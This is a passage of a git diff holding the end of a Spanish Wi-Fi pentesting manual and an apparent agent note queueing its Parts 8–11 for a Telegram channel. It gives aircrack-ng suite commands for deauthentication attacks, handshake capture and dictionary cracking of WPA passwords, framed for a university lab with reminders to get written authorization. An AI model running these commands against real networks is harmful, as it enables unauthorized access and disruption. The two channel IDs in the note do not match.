|
||||
| Deauth 1 cliente | `sudo aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLI wlan0mon` |
|
||||
| Crackear | `aircrack-ng -w rockyou.txt file.cap` |
|
||||
| Salir monitor | `sudo airmon-ng stop wlan0mon` |
|
||||
|
||||
---
|
||||
|
||||
## PARTE 12: TIPS PARA EL LABORATORIO UNIVERSITARIO
|
||||
|
||||
1. **Empieza solo con escaneo pasivo** (`airodump-ng`) — aprende a leer las redes antes de hacer nada activo
|
||||
2. **Documenta** qué redes hay, en qué canales, qué cifrado usan
|
||||
3. **Solo testea redes que tengas autorización explícita** — pide al profesor/encargado por escrito
|
||||
4. **Practica primero con tu propio router** si puedes
|
||||
5. El `rockyou.txt` viene en Kali en `/usr/share/wordlists/` (descomprimir con `sudo gunzip`)
|
||||
6. **No hagas deauth en redes públicas reales** — es ilegal sin autorización
|
||||
7. Si la señal es mala (PWR < -70), acércate al router o usa la antena con el reflector parabólico
|
||||
85
docs/pending_telegram_send.md
Normal file
85
docs/pending_telegram_send.md
Normal file
@@ -0,0 +1,85 @@
|
||||
# PENDIENTE: Envío manual pentesting Alpha AWUS036ACH al canal IDD Telegram
|
||||
|
||||
**Estado:** 4 mensajes pendientes de envío (Partes 8-11)
|
||||
**Canal IDD:** -1003967773087
|
||||
**Razón del fallo:** Timeout MCP Telegram (servidor caído/sobrecargado)
|
||||
**Fecha:** 2026-08-08
|
||||
|
||||
## Instrucciones para la próxima sesión
|
||||
|
||||
Al iniciar, enviar estos 4 mensajes AL CANAL IDD (`-10033967773087`) en orden.
|
||||
Usar `telegram_send_message` con `peer: "-1003967773087"`.
|
||||
|
||||
**IMPORTANTE:** El manual COMPLETO (Partes 1-7 + 8-11) ya está guardado en:
|
||||
`docs/manual_pentesting_alpha_awus036ach.md`
|
||||
|
||||
Si el MCP Telegram sigue sin funcionar, enviar el contenido del fichero manual como 1 solo mensaje o copiarlo al portapapeles para que el usuario lo pegue manualmente.
|
||||
|
||||
---
|
||||
|
||||
## MENSAJE 1 - PARTE 8
|
||||
|
||||
PARTE 8: CRACKEAR LA CONTRASEÑA
|
||||
|
||||
Descomprime el diccionario:
|
||||
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
|
||||
|
||||
Crackea:
|
||||
aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap
|
||||
|
||||
Si esta en el diccionario veras:
|
||||
KEY FOUND! [ la_contraseña ]
|
||||
|
||||
Guarda la contraseña:
|
||||
echo "RED: CampusLab | PASS: la_contraseña" >> ~/wifi_cracked.txt
|
||||
|
||||
---
|
||||
|
||||
## MENSAJE 2 - PARTE 9
|
||||
|
||||
PARTE 9: PERSISTENCIA DEL USB (GUARDAR RESULTADOS)
|
||||
|
||||
Si usas Kali Live, al reiniciar TODO se pierde.
|
||||
|
||||
Opcion A - Rufus Persistent Partition (ya lo hiciste en Parte 2)
|
||||
Si activaste Persistent storage en Rufus, los archivos en
|
||||
/home/kali se guardan automaticamente.
|
||||
|
||||
Opcion B - Montar particion persistente:
|
||||
sudo mkdir -p /mnt/persistence
|
||||
sudo mount /dev/sdb3 /mnt/persistence
|
||||
cp captura-01.cap /mnt/persistence/
|
||||
echo "RED: CampusLab | PASS: la_contraseña" > /mnt/persistence/wifi_cracked.txt
|
||||
sudo umount /mnt/persistence
|
||||
|
||||
Opcion C - Segundo USB o red:
|
||||
cp captura-01.cap /media/kali/MI_USB/
|
||||
|
||||
---
|
||||
|
||||
## MENSAJE 3 - PARTE 10
|
||||
|
||||
PARTE 10: RESUMEN DE COMANDOS RAPIDOS
|
||||
|
||||
Ver antena: lsusb && iwconfig
|
||||
Matar interfer.: sudo airmon-ng check kill
|
||||
Activar monitor: sudo airmon-ng start wlan0
|
||||
Escanear redes: sudo airodump-ng wlan0mon
|
||||
Capturar 1 red: sudo airodump-ng -c CH --bssid MAC -w file wlan0mon
|
||||
Deauth: sudo aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLI wlan0mon
|
||||
Crackear: aircrack-ng -w rockyou.txt file.cap
|
||||
Salir monitor: sudo airmon-ng stop wlan0mon
|
||||
|
||||
---
|
||||
|
||||
## MENSAJE 4 - PARTE 11
|
||||
|
||||
PARTE 11: TIPS PARA EL LABORATORIO
|
||||
|
||||
1. Empieza con escaneo pasivo (airodump-ng)
|
||||
2. Documenta: redes, canales, cifrado
|
||||
3. Solo testea redes con autorizacion escrita
|
||||
4. Practica primero con tu propio router
|
||||
5. rockyou.txt en /usr/share/wordlists/
|
||||
6. No hagas deauth en redes publicas reales
|
||||
7. Senal mala? Acercate al router o usa reflector
|
||||
Reference in New Issue
Block a user